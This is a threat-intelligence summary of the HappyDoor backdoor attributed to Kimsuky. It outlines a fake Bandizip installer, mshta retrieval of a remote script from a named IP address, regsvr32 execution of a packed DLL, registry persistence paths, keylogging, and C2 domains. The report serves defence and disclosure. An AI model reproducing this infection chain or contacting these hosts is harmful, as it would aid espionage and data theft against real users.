PIOLINK analyzed HappyDoor malware activity attributed in the report to the Kimsuky group, described as a North Korea-linked APT focused on espionage against South Korean and other Asian diplomatic, defense, government, and military research targets. The infection chain uses a fake Bandizip installer that drops and launches a legitimate-looking installer while using mshta to retrieve a remote HTML/VBScript payload from 67.217.62.222. The downloaded script collects user, system, IP, and network information, while a VMProtect-packed DLL named 9A4E.tmp is executed through regsvr32 with staged parameters to install, initialize, and run the backdoor from %AppData%\Roaming\AppRoot\. HappyDoor stores configuration and RSA-related data under HKCU\SOFTWARE\Microsoft\Notepad\ and C2 details under HKCU\SOFTWARE\Microsoft\FTP\, then performs data theft functions including screenshots and keylogging and sends encrypted output to C2 URLs such as u.appw.p-e.kr and d.appz.p-e.kr. The campaign shows Kimsuky-style social engineering through trusted software impersonation and reinforces the risk of installing packages from untrusted sources.